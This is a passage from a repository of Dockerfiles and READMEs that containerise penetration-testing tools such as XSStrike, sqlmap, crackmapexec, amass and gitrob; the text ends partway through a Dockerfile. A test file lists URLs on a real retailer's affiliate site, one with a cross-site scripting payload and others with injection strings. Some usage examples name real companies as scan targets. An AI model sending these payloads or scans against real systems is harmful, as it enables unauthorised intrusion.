├── .gitignore ├── BugBountyAutomator ├── Dockerfile └── README.md ├── John └── Dockerfile ├── README.md ├── XSStrike ├── Dockerfile ├── README.md └── test.tct ├── aiodns ├── Dockerfile ├── README.md └── jsonparser.py ├── amass ├── Dockerfile └── README.md ├── aquatone └── Dockerfile ├── arjun ├── Dockerfile └── README.md ├── assetfinder ├── Dockerfile └── README.md ├── cewl ├── Dockerfile └── README.md ├── corsy ├── Dockerfile └── README.md ├── crackmapexec ├── Dockerfile └── README.md ├── crosslink ├── Dockerfile └── README.md ├── curl └── Dockerfile ├── dataparser ├── Dockerfile ├── README.md ├── main.py └── uniq.py ├── enum4linux ├── Dockerfile └── README.md ├── eyewitness ├── Dockerfile └── README.md ├── finddomain ├── Dockerfile └── README.md ├── getJS └── Dockerfile ├── get_ip ├── Dockerfile ├── README.md └── get_ip.py ├── getallurls └── Dockerfile ├── gf ├── Dockerfile └── README.md ├── gitrob ├── Dockerfile └── README.md ├── gittools └── Dockerfile ├── gmaps_api_scanner └── Dockerfile ├── gobuster ├── Dockerfile └── README.md ├── gospider └── Dockerfile ├── hakrawler ├── Dockerfile └── README.md ├── hashid ├── Dockerfile └── README.md ├── httprobe └── Dockerfile ├── ip_info ├── Dockerfile ├── README.md └── ip_info.py ├── jwt ├── Dockerfile ├── README.md ├── key.test └── token.py ├── katana └── Dockerfile ├── kiterunner ├── Dockerfile └── README.md ├── knockpy ├── Dockerfile └── README.md ├── linkfinder ├── Dockerfile └── README.md ├── masscan └── Dockerfile ├── massscan └── Dockerfile ├── meg └── Dockerfile ├── metagoofil └── Dockerfile ├── nikto └── Dockerfile ├── nmap ├── Dockerfile └── README.md ├── nmap_debian └── Dockerfile ├── nmap_searchsploit ├── Dockerfile ├── README.md └── scan.sh ├── ntlmscan ├── Dockerfile └── Readme.md ├── nuclei ├── Dockerfile └── README.md ├── osmedeus └── Dockerfile ├── parameth └── Dockerfile ├── paramspider ├── Dockerfile └── README.md ├── pdftotext ├── Dockerfile └── README.md ├── photon ├── Dockerfile └── README.md ├── sherlock └── Dockerfile ├── shodan_info ├── Dockerfile └── shodan_info.py ├── smuggler ├── Dockerfile └── README.md ├── smuggler2 ├── Dockerfile └── README.md ├── sqlmap └── Dockerfile ├── sqlmap_module ├── Dockerfile ├── README.md └── config.json ├── sslyze └── Dockerfile ├── subjack ├── Dockerfile └── README.md ├── sublist3r ├── Dockerfile └── README.md ├── subscraper ├── Dockerfile └── README.md ├── test-module └── Dockerfile ├── theharvester └── Dockerfile ├── tomnomnom-gf ├── Dockerfile └── README.md ├── url_extractor_module └── Dockerfile ├── urlprobe ├── Dockerfile └── README.md ├── viewstate-generator ├── Dockerfile └── README.md ├── waybackurl └── Dockerfile ├── wfuzz_github ├── Dockerfile └── README.md ├── wfuzz_pip ├── Dockerfile └── README.md ├── whatwaf ├── Dockerfile └── README.md └── wpscan └── Dockerfile /.gitignore: -------------------------------------------------------------------------------- 1 | *.txt 2 | *.xml 3 | output 4 | *.log 5 | *.key 6 | .DS_Store -------------------------------------------------------------------------------- /BugBountyAutomator/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM hackersploit/bugbountytoolkit:latest 2 | 3 | RUN apt update 4 | 5 | RUN mkdir /root/tools 6 | 7 | RUN mkdir /data && cd / 8 | 9 | RUN git clone https://github.com/chvancooten/BugBountyScanner.git &&\ 10 | cd BugBountyScanner &&\ 11 | chmod +x BugBountyAutomator.sh &&\ 12 | ln -s BugBountyAutomator.sh /usr/bin/BugBountyAutomator 13 | 14 | WORKDIR /data 15 | 16 | #ENTRYPOINT [ "../root/BugBountyScanner/BugBountyAutomator.sh" ] -------------------------------------------------------------------------------- /BugBountyAutomator/README.md: -------------------------------------------------------------------------------- 1 | 2 | Process is interactive rn because you have to set the test to torough 3 | `docker run -it --rm -v "$(pwd):/data" bb bash` 4 | 5 | Currently is headless not working. -------------------------------------------------------------------------------- /John/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM library/centos:latest 2 | 3 | RUN yum -y update && \ 4 | yum install -y openssl openssl-devel nss-devel \ 5 | gmp-devel krb5-devel git @development 6 | 7 | WORKDIR /root 8 | 9 | RUN git clone https://github.com/magnumripper/JohnTheRipper.git 10 | 11 | WORKDIR JohnTheRipper/src 12 | 13 | RUN ./configure && make clean && make -s 14 | 15 | WORKDIR /root/JohnTheRipper/run 16 | 17 | ENTRYPOINT ["./john"] -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Introduction 2 | 3 | This repository contains various dockerized tools used in security assesments. 4 | 5 | ## Todo 6 | 7 | - Keep container size in mind. nmap/searchsploit is 3G big. 8 | 9 | - https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE 10 | 11 | ## Websites 12 | 13 | - https://chaos.projectdiscovery.io/#/ 14 | 15 | ## Tools 16 | 17 | - https://github.com/projectdiscovery/subfinder 18 | - https://github.com/projectdiscovery/naabu 19 | - https://github.com/projectdiscovery/nuclei 20 | - https://github.com/jcesarstef/dotdotslash 21 | - https://github.com/evyatarmeged/Raccoon 22 | - https://github.com/googleinurl/SCANNER-INURLBR 23 | - https://github.com/urbanadventurer/WhatWeb 24 | - https://github.com/rezasp/joomscan 25 | - https://github.com/AlisamTechnology/ATSCAN what? 26 | - https://github.com/darkoperator/dnsrecon 27 | - https://github.com/droope/droopescan 28 | - https://github.com/eschultze/URLextractor 29 | - https://github.com/Dionach/CMSmap 30 | - https://github.com/hatlord/Spiderpig 31 | - https://github.com/hatlord/snmpwn 32 | - https://github.com/Nekmo/dirhunt/tree/master 33 | - https://github.com/m4ll0k/WAScan 34 | - https://github.com/s0md3v/XSStrike 35 | - https://github.com/s0md3v/Photon 36 | - https://github.com/s0md3v/Arjun 37 | - https://github.com/urbanadventurer/WhatWeb 38 | - https://github.com/jobertabma/relative-url-extractor 39 | - https://github.com/Cillian-Collins/dirscraper 40 | 41 | ## Payloads 42 | 43 | - https://github.com/Bo0oM/fuzz.txt 44 | - https://github.com/Team-Firebugs/Burp-LFI-tests 45 | - https://github.com/swisskyrepo/PayloadsAllTheThings 46 | - https://github.com/danielmiessler/SecLists 47 | - https://github.com/payloadbox 48 | - https://github.com/foospidy/payloads 49 | - https://github.com/1N3/IntruderPayloads 50 | - https://github.com/pgaijin66/XSS-Payloads 51 | - https://github.com/RenwaX23/XSS-Payloads 52 | - https://github.com/cujanovic/CRLF-Injection-Payloads 53 | - https://github.com/trietptm/SQL-Injection-Payloads 54 | - https://github.com/cujanovic/Open-Redirect-Payloads 55 | 56 | 57 | -------------------------------------------------------------------------------- /XSStrike/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | 4 | RUN apt update && apt install git 5 | 6 | RUN git clone https://github.com/s0md3v/XSStrike.git xss 7 | 8 | RUN pip3 install tld 9 | RUN pip3 install requests 10 | RUN pip3 install fuzzywuzzy 11 | 12 | ENTRYPOINT [ "python", "xss/xsstrike.py" ] 13 | -------------------------------------------------------------------------------- /XSStrike/README.md: -------------------------------------------------------------------------------- 1 | ### Usage 2 | 3 | `docker build . -t jwt` 4 | 5 | `docker run -it --rm -v "$(pwd):/source" jwt bash` 6 | 7 | Execute 8 | 9 | `python token.py key.pem $token` 10 | -------------------------------------------------------------------------------- /XSStrike/test.tct: -------------------------------------------------------------------------------- 1 | http://affiliate.otto.de/?bfmid=37922949&bfpage=a_sort_high&bfxid=044&siteid=40786270 2 | http://affiliate.otto.de/?format=xml&rest_route=%2Foembed%2F1.0%2Fembed&url=http%3A%2F%2Faffiliate.otto.de%2F%3Fpage_id%3D11 3 | http://affiliate.otto.de/?p=11 4 | http://affiliate.otto.de/?rest_route=%2Foembed%2F1.0%2Fembed&url=http%3A%2F%2Faffiliate.otto.de%2F%3Fpage_id%3D11 5 | http://affiliate.otto.de/?werbemittel=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fxor2.net%2F%29%3C%2Fscript%3E%3C%21-- 6 | http://affiliate.otto.de/creative/sortiment/happypreis/happy_preis_160x600.swf/?AffiliateID=40716150%27+++%27&IWL=042&campid=110651&clickTag=%27+++escape%27http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fsite%3D2950%26ref%3D546468%26subid%3D%26type%3Dhtml%26hnb%3D46%26diurl%3D%27+++escape%27http%3A%2F%2Fwww.otto.de%2Fextern%2F%3FCategoryName%3Dsh9791440&pxid=2 7 | http://affiliate.otto.de/creative/sortiment/happypreis/happy_preis_160x600.swf?AffiliateID=40716150%27%29%29+++%27&IWL=042&campid=110651&clickTag=%27+++escape%28%27http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fsite%3D2950%26ref%3D239626%26subid%3D%26type%3Dhtml%26hnb%3D46%26diurl%3D%27+++escape%28%27http%3A%2F%2Fwww.otto.de%2Fextern%2F%3FCategoryName%3Dsh9791440&pxid=2 8 | http://affiliate.otto.de/creative/sortiment/happypreis/happy_preis_300x250.swf/?AffiliateID=40716150%27+++%27&IWL=042&campid=110655&clickTag=%27+++escape%27http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fsite%3D2950%26ref%3D554740%26subid%3D%26type%3Dhtml%26hnb%3D47%26diurl%3D%27+++escape%27http%3A%2F%2Fwww.otto.de%2Fextern%2F%3FCategoryName%3Dsh9791440&pxid=2 9 | http://affiliate.otto.de/creative/sortiment/happypreis/happy_preis_300x250.swf?AffiliateID=40716150%27%29%29+++%27&IWL=042&campid=110655&clickTag=%27+++escape%28%27http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fsite%3D2950%26ref%3D471617%26subid%3D%26type%3Dhtml%26hnb%3D47%26diurl%3D%27+++escape%28%27http%3A%2F%2Fwww.otto.de%2Fextern%2F%3FCategoryName%3Dsh9791440&pxid=2 10 | http://affiliate.otto.de/creative/sortiment/happypreis/happy_preis_728x90.swf/?AffiliateID=40716150%27+++%27&IWL=042&campid=110647&clickTag=%27+++escape%27http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fsite%3D2950%26ref%3D554740%26subid%3D%26type%3Dhtml%26hnb%3D48%26diurl%3D%27+++escape%27http%3A%2F%2Fwww.otto.de%2Fextern%2F%3FCategoryName%3Dsh9791440&pxid=2 -------------------------------------------------------------------------------- /aiodns/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git wget -y &&\ 5 | git clone https://github.com/blark/aiodnsbrute.git 6 | 7 | 8 | 9 | RUN cd /aiodnsbrute && python setup.py install 10 | 11 | RUN mkdir /data 12 | WORKDIR /data 13 | 14 | 15 | # Create Resolvers file 16 | RUN echo 8.8.8.8 > /dns_resolver.txt 17 | # Create Subdomain List 18 | RUN wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt -O /sublist.txt 19 | 20 | ENTRYPOINT [ "python", "/aiodnsbrute/aiodnsbrute/cli.py" ] -------------------------------------------------------------------------------- /aiodns/README.md: -------------------------------------------------------------------------------- 1 | ## Arguments 2 | 3 | ``` 4 | $ aiodnsbrute --help 5 | 6 | Usage: cli.py [OPTIONS] DOMAIN 7 | 8 | aiodnsbrute is a command line tool for brute forcing domain names 9 | utilizing Python's asyncio module. 10 | 11 | credit: blark (@markbaseggio) 12 | 13 | Options: 14 | -w, --wordlist TEXT Wordlist to use for brute force. 15 | -t, --max-tasks INTEGER Maximum number of tasks to run asynchronosly. 16 | -r, --resolver-file FILENAME A text file containing a list of DNS resolvers 17 | to use, one per line, comments start with #. 18 | Default: use system resolvers 19 | -v, --verbosity Increase output verbosity 20 | -o, --output [csv|json|off] Output results to DOMAIN.csv/json (extension 21 | automatically appended when not using -f). 22 | -f, --outfile FILENAME Output filename. Use '-f -' to send file 23 | output to stdout overriding normal output. 24 | --query / --gethostbyname DNS lookup type to use query (default) should 25 | be faster, but won't return CNAME information. 26 | --wildcard / --no-wildcard Wildcard detection, enabled by default 27 | --verify / --no-verify Verify domain name is sane before beginning, 28 | enabled by default 29 | --version Show the version and exit. 30 | --help Show this message and exit. 31 | ``` 32 | 33 | Example: 34 | 35 | `docker run --rm -it -v "$(pwd):/data" aiodns -r /dns_resolver.txt -w /sublist.txt -t 50 -o json -f /data/$filename $domain` 36 | -------------------------------------------------------------------------------- /aiodns/jsonparser.py: -------------------------------------------------------------------------------- 1 | import json 2 | import sys 3 | 4 | def main(): 5 | input_file_path = sys.argv[1] 6 | output_file_path = sys.argv[2] 7 | json_file = open(input_file_path, "r") 8 | data = json.load(json_file) 9 | output_file = open(output_file_path, "w+") 10 | for entry in data: 11 | output_file.write(entry["domain"] + "\n") 12 | print(entry["domain"]) 13 | 14 | if __name__ == "__main__": 15 | main() -------------------------------------------------------------------------------- /amass/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.12.6-alpine3.10 as build 2 | RUN apk --no-cache add git 3 | RUN go get github.com/OWASP/Amass; exit 0 4 | ENV GO111MODULE on 5 | WORKDIR /go/src/github.com/OWASP/Amass 6 | RUN go install ./... 7 | 8 | FROM alpine:latest 9 | COPY --from=build /go/bin/amass /bin/amass 10 | COPY --from=build /go/src/github.com/OWASP/Amass/wordlists/ /wordlists/ 11 | RUN mkdir /loot 12 | ENV HOME / 13 | ENTRYPOINT ["/bin/amass"] -------------------------------------------------------------------------------- /amass/README.md: -------------------------------------------------------------------------------- 1 | ## Amass Container 2 | 3 | Pass in Hostfile and scan all supplied hosts 4 | 5 | # ToDo 6 | 7 | active checks 8 | 9 | Bash script wrapper for simpler commands 10 | script should also split ips and domain names in separate files 11 | # Commands 12 | 13 | ``` 14 | 15 | docker run --rm -v "$(pwd):/loot" 16 | 17 | amass enum -active -o /loot/output -ip -r 8.8.8.8 -d 18 | 19 | #Normal 20 | amass enum -o /loot/out/output -ip -r 8.8.8.8 -d 21 | ``` -------------------------------------------------------------------------------- /aquatone/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | # Prepare 4 | RUN apt-get update 5 | RUN apt-get install --fix-missing 6 | 7 | # Install normal Packages needed 8 | RUN apt-get install -y apt-utils unzip wget curl 9 | # Install chromedriver 10 | RUN wget https://chromedriver.storage.googleapis.com/2.41/chromedriver_linux64.zip && \ 11 | unzip chromedriver_linux64.zip && \ 12 | mv chromedriver /bin/chromedriver && \ 13 | chmod +x /bin/chromedriver && \ 14 | rm -rf chromedriver_linux64.zip 15 | 16 | RUN wget "https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_arm64_1.7.0.zip" &&\ 17 | unzip /aquatone_linux_arm64_1.7.0.zip &&\ 18 | mv aquatone /bin/aquatone &&\ 19 | mkdir /data &&\ 20 | rm -rf aquatone_linux_arm64_1.7.0.zip 21 | 22 | WORKDIR /data 23 | # set to bash so you can set keys before running aquatone. 24 | ENTRYPOINT ["cat $1 | aquatone --chrome-path /bin"] -------------------------------------------------------------------------------- /arjun/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install git -y &&\ 5 | git clone https://github.com/s0md3v/Arjun.git &&\ 6 | pip install requests 7 | 8 | WORKDIR /Arjun 9 | 10 | ENTRYPOINT [ "python", "arjun.py" ] 11 | -------------------------------------------------------------------------------- /arjun/README.md: -------------------------------------------------------------------------------- 1 | ## Parameter 2 | 3 | ``` 4 | --urls file 5 | 6 | -u domain 7 | 8 | docker run -it -v"$(pwd):/root" --rm arjun --urls /root/... --get -t 4 9 | 10 | docker run -it --rm -v "$(pwd):/root" arjun --urls /root/cleaned-netze.txt --get 11 | ``` 12 | -------------------------------------------------------------------------------- /assetfinder/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get -u github.com/tomnomnom/assetfinder 5 | 6 | ENTRYPOINT [ "assetfinder" ] -------------------------------------------------------------------------------- /assetfinder/README.md: -------------------------------------------------------------------------------- 1 | ## Usage 2 | 3 | `cd assetfinder && docker build . -t assetfinder` 4 | 5 | 6 | `docker run -it --rm assetfinder --subs-only swisscom.com` -------------------------------------------------------------------------------- /cewl/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ruby:latest 2 | 3 | RUN apt update &&\ 4 | apt install git exiftool -y 5 | 6 | RUN gem install mime-types 7 | RUN gem install rubyzip 8 | RUN gem install mini_exiftool 9 | RUN gem install spider 10 | RUN gem install nokogiri 11 | RUN gem install mime 12 | RUN git clone https://github.com/digininja/CeWL.git 13 | 14 | WORKDIR /CeWL 15 | 16 | RUN chmod +x /CeWL/cewl.rb 17 | 18 | ENTRYPOINT [ "./cewl.rb" ] -------------------------------------------------------------------------------- /cewl/README.md: -------------------------------------------------------------------------------- 1 | ## Parameter 2 | 3 | ``` 4 | docker run -it --rm cewl --convert-umlauts -w /root/stadtwerke.txt -m https://www.stadtwerke-stuttgart.de 5 | 6 | docker run -it --rm cewl https://www.stadtwerke-stuttgart.de 7 | 8 | ``` 9 | -------------------------------------------------------------------------------- /corsy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update 4 | 5 | RUN apt install -y git 6 | 7 | RUN git clone https://github.com/s0md3v/Corsy.git 8 | 9 | RUN cd Corsy && pip install -r requirements.txt 10 | 11 | WORKDIR /Corsy 12 | 13 | ENTRYPOINT [ "python", "corsy.py" ] -------------------------------------------------------------------------------- /corsy/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AvasDream/pentesting-dockerfiles/dbe3efa3ec16dcf457b9e8708b8bb3a5c353fd7f/corsy/README.md -------------------------------------------------------------------------------- /crackmapexec/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update &&\ 4 | apt install -y git &&\ 5 | apt-get install -y libssl-dev libffi-dev python-dev build-essential &&\ 6 | git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec &&\ 7 | cd CrackMapExec &&\ 8 | python3 setup.py install 9 | 10 | 11 | ENTRYPOINT [ "crackmapexec" ] -------------------------------------------------------------------------------- /crackmapexec/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ``` 5 | docker run --rm -it crackmapexec smb --sessions --shares --disks loggedon-users 10.11.1.1-254 6 | ``` -------------------------------------------------------------------------------- /crosslink/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | 4 | RUN rm -rf /etc/localtime &&\ 5 | ln -s /usr/share/zoneinfo/Europe/Berlin /etc/localtime 6 | 7 | RUN date 8 | 9 | RUN apt update &&\ 10 | git clone https://github.com/m8r0wn/crosslinked &&\ 11 | cd crosslinked &&\ 12 | pip3 install -r requirements.txt 13 | 14 | WORKDIR /crosslinked 15 | 16 | RUN mkdir output 17 | 18 | #ENTRYPOINT [ "python", "/crosslinked/crosslinked.py" ] -------------------------------------------------------------------------------- /crosslink/README.md: -------------------------------------------------------------------------------- 1 | [Github](https://github.com/m8r0wn/CrossLinked) 2 | 3 | ```bash 4 | docker run -it -v "$(pwd):/output" crosslink -f '{first}.{last}@company.com' -j 1 "company" 5 | ``` 6 | -------------------------------------------------------------------------------- /curl/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:latest 2 | 3 | RUN apk update &&\ 4 | apk add curl 5 | 6 | ENTRYPOINT [ "curl" ] -------------------------------------------------------------------------------- /dataparser/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update 4 | 5 | RUN mkdir /data 6 | WORKDIR /data 7 | 8 | ENTRYPOINT [ "/bin/bash" ] 9 | -------------------------------------------------------------------------------- /dataparser/README.md: -------------------------------------------------------------------------------- 1 | ## Module only for data parsing -------------------------------------------------------------------------------- /dataparser/main.py: -------------------------------------------------------------------------------- 1 | 2 | import sys 3 | import os 4 | import re 5 | """ 6 | Refactoring 7 | - Regex in own function 8 | """ 9 | def main(): 10 | if len(sys.argv) != 3: 11 | print(" Usage:\n python dataparser.py ") 12 | sys.exit(1) 13 | else: 14 | input = { 15 | "type": sys.argv[1], 16 | "file": sys.argv[2] 17 | } 18 | type_parser(input) 19 | 20 | def type_parser(input): 21 | print_info("Input:" + str(input) + "\n") 22 | all_types = ["amass","knockpy"] 23 | if not os.path.isfile(input["file"]) or input["type"] not in all_types: 24 | print("File not found or Wrong type") 25 | sys.exit(1) 26 | else: 27 | if input["type"] in "amass": 28 | parse_amass(input["file"]) 29 | if input["type"] in "knockpy": 30 | parse_knockpy(input["file"]) 31 | 32 | def parse_knockpy(file): 33 | print_info("File to open:" + file) 34 | if not os.path.isfile(file): 35 | print("File does not exist") 36 | sys.exit(1) 37 | else: 38 | f = open(file, "r") 39 | data = [] 40 | for l in f.readlines(): 41 | line = l.split() 42 | print(line) 43 | data.append(line) 44 | ips = open("/data/output/knockpy_ips.txt", "w") 45 | domains = open("/data/output/knockpy_domains.txt", "w") 46 | for array in data: 47 | for element in array: 48 | ip = re.match("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$", element) 49 | domain = re.match("^[\w.-]+(?:\.[A-Za-z\.-]+)+[\w\-\._~:/?#[\]@!\$&'\(\)\*\+,;=.]+$", element) 50 | if ip is not None: 51 | ips.write(ip.group()+"\n") 52 | if domain is not None: 53 | domains.write(domain.group()+"\n") 54 | f.close() 55 | ips.close() 56 | domains.close() 57 | 58 | 59 | def parse_amass(file): 60 | if not os.path.isfile(file): 61 | print("File does not exist") 62 | sys.exit(1) 63 | else: 64 | f = open(file, "r") 65 | data = [] 66 | for l in f.readlines(): 67 | line = l.split() 68 | data.append(line) 69 | ips = open("/data/output/amass_ips.txt", "w") 70 | domains = open("/data/output/amass_domains.txt", "w") 71 | for array in data: 72 | ips.write(array[1]+"\n") 73 | domains.write(array[0]+"\n") 74 | f.close() 75 | ips.close() 76 | domains.close() 77 | 78 | def print_info(text): 79 | print("[*] " + text) 80 | def print_error(text): 81 | print("[!] " + text) 82 | 83 | if __name__ == "__main__": 84 | main() 85 | -------------------------------------------------------------------------------- /dataparser/uniq.py: -------------------------------------------------------------------------------- 1 | import os 2 | def main(): 3 | domains = set() 4 | ips = set() 5 | for file in os.listdir("output"): 6 | f = open("output/"+ file, "r") 7 | if "domains" in file: 8 | for line in f: 9 | if line not in domains: 10 | domains.add(line) 11 | if "ips" in file: 12 | for line in f: 13 | if line not in ips: 14 | ips.add(line) 15 | 16 | domains_file = open("output/domains_all.txt", "w") 17 | for element in domains: 18 | domains_file.write(element) 19 | ips_file = open("output/ips_all.txt", "w") 20 | for ip in ips: 21 | ips_file.write(ip) 22 | 23 | 24 | if __name__ == "__main__": 25 | main() -------------------------------------------------------------------------------- /enum4linux/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM fedora 2 | LABEL maintainer="security@lists.fedoraproject.org" 3 | ENV PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 4 | 5 | RUN useradd -c 'enum4linux' -m -s /sbin/nologin enum4linux 6 | RUN dnf upgrade -y && \ 7 | dnf install -y \ 8 | samba-client \ 9 | which \ 10 | perl \ 11 | perl-Data-Dumper \ 12 | git \ 13 | bzip2 \ 14 | openldap-clients \ 15 | samba-common-tools && \ 16 | cd /tmp && \ 17 | curl -o polenum-0.2.tar.bz2 https://labs.portcullis.co.uk/download/polenum-0.2.tar.bz2 && \ 18 | git clone https://github.com/portcullislabs/enum4linux.git && \ 19 | mv enum4linux/enum4linux.pl /usr/bin/enum4linux && \ 20 | rm -rf enum4linux/.git && \ 21 | mv enum4linux /usr/share/enum4linux && \ 22 | tar -xjf polenum-0.2.tar.bz2 && \ 23 | mv polenum-0.2/polenum.py /usr/bin/polenum.py && \ 24 | mv polenum-0.2 /usr/share/polenum && \ 25 | dnf erase -y \ 26 | git \ 27 | bzip2 && \ 28 | dnf clean all 29 | USER enum4linux 30 | ENTRYPOINT [ "enum4linux" ] 31 | CMD [ "-h" ] -------------------------------------------------------------------------------- /enum4linux/README.md: -------------------------------------------------------------------------------- 1 | ## Creator 2 | 3 | https://github.com/fedoraredteam/red-container/blob/master/enum4linux/Dockerfile -------------------------------------------------------------------------------- /eyewitness/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt-get update \ 4 | && export DEBIAN_FRONTEND=noninteractive \ 5 | && apt-get install -y \ 6 | git \ 7 | wget \ 8 | phantomjs \ 9 | && rm -rf /var/lib/apt/lists/* 10 | RUN git clone https://github.com/ChrisTruncer/EyeWitness.git 11 | 12 | WORKDIR /EyeWitness/Python/setup 13 | RUN ./setup.sh 14 | 15 | RUN mkdir /output 16 | 17 | 18 | WORKDIR /output/ 19 | 20 | ENTRYPOINT ["python", "/EyeWitness/Python/EyeWitness.py"] -------------------------------------------------------------------------------- /eyewitness/README.md: -------------------------------------------------------------------------------- 1 | ## Usage 2 | 3 | `docker run -it --rm -v "$(pwd):/output" eyewitness -d /output/visual --web -f subdomains.txt` -------------------------------------------------------------------------------- /finddomain/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN apt update &&\ 4 | apt install wget -y &&\ 5 | wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux &&\ 6 | chmod +x findomain-linux 7 | 8 | ENTRYPOINT [ "./findomain-linux" ] -------------------------------------------------------------------------------- /finddomain/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AvasDream/pentesting-dockerfiles/dbe3efa3ec16dcf457b9e8708b8bb3a5c353fd7f/finddomain/README.md -------------------------------------------------------------------------------- /getJS/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get -u github.com/003random/getJS 5 | 6 | ENTRYPOINT [ "getJS" ] -------------------------------------------------------------------------------- /get_ip/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update 4 | 5 | RUN pip install requests 6 | 7 | RUN mkdir /source 8 | WORKDIR /source 9 | 10 | ENTRYPOINT [ "python", "/source/get_ip.py" ] -------------------------------------------------------------------------------- /get_ip/README.md: -------------------------------------------------------------------------------- 1 | ## Usage dev 2 | 3 | ``` 4 | docker build . -t get_ip 5 | docker run --rm -v "$(pwd):/source" get_ip 6 | ``` 7 | 8 | ## Usage prod 9 | 10 | ``` 11 | docker pull 12 | docker run 13 | ``` 14 | 15 | ## ToDo 16 | -------------------------------------------------------------------------------- /get_ip/get_ip.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import pprint 4 | 5 | def get_ip(): 6 | """Get the external IPv4 from Host. 7 | """ 8 | api_urls = ["ipv4bot.whatismyipaddress.com"] 9 | ips = [] 10 | for url in api_urls: 11 | resp= requests.get(f"http://{url}") 12 | if resp.status_code is not 200: 13 | print("[!] Error while retrieving data from API") 14 | sys.exit(1) 15 | else: 16 | ips.append(resp.text) 17 | print(ips) 18 | if __name__ == "__main__": 19 | get_ip() -------------------------------------------------------------------------------- /getallurls/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update &&\ 4 | go get -u github.com/lc/gau 5 | 6 | ENTRYPOINT [ "gau" ] -------------------------------------------------------------------------------- /gf/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:alpine AS build 2 | 3 | RUN apk add --no-cache git 4 | 5 | RUN go get -u github.com/tomnomnom/gf 6 | RUN mkdir /root/.gf 7 | RUN git clone https://github.com/1ndianl33t/Gf-Patterns 8 | RUN mv Gf-Patterns/*.json ~/.gf 9 | RUN cp /go/bin/* /usr/bin/ 10 | 11 | RUN mkdir /data 12 | 13 | CMD "gf" -------------------------------------------------------------------------------- /gf/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AvasDream/pentesting-dockerfiles/dbe3efa3ec16dcf457b9e8708b8bb3a5c353fd7f/gf/README.md -------------------------------------------------------------------------------- /gitrob/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update && apt install git bash -y 4 | 5 | RUN go get github.com/michenriksen/gitrob 6 | 7 | ENTRYPOINT [ "gitrob" ] -------------------------------------------------------------------------------- /gitrob/README.md: -------------------------------------------------------------------------------- 1 | ## Gitrob 2 | 3 | ``` 4 | export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef 5 | 6 | -bind-address string 7 | Address to bind web server to (default "127.0.0.1") 8 | -commit-depth int 9 | Number of repository commits to process (default 500) 10 | -debug 11 | Print debugging information 12 | -github-access-token string 13 | GitHub access token to use for API requests 14 | -load string 15 | Load session file 16 | -no-expand-orgs 17 | Don't add members to targets when processing organizations 18 | -port int 19 | Port to run web server on (default 9393) 20 | -save string 21 | Save session to file 22 | -silent 23 | Suppress all output except for errors 24 | -threads int 25 | Number of concurrent threads (default number of logical CPUs) 26 | ``` 27 | 28 | ``` 29 | docker run -it --rm -p 80:80 gitrob -github-access-token $token -port 80 -threads 16 -bind-address 0.0.0.0 megacorpone 30 | ``` 31 | -------------------------------------------------------------------------------- /gittools/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | 4 | RUN apt update && apt install git -y 5 | 6 | RUN git clone https://github.com/internetwache/GitTools.git 7 | 8 | RUN mkdir /data 9 | 10 | -------------------------------------------------------------------------------- /gmaps_api_scanner/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update && apt install git && pip install requests 4 | 5 | 6 | RUN git clone https://github.com/ozguralp/gmapsapiscanner.git 7 | 8 | 9 | WORKDIR /gmapsapiscanner 10 | 11 | ENTRYPOINT [ 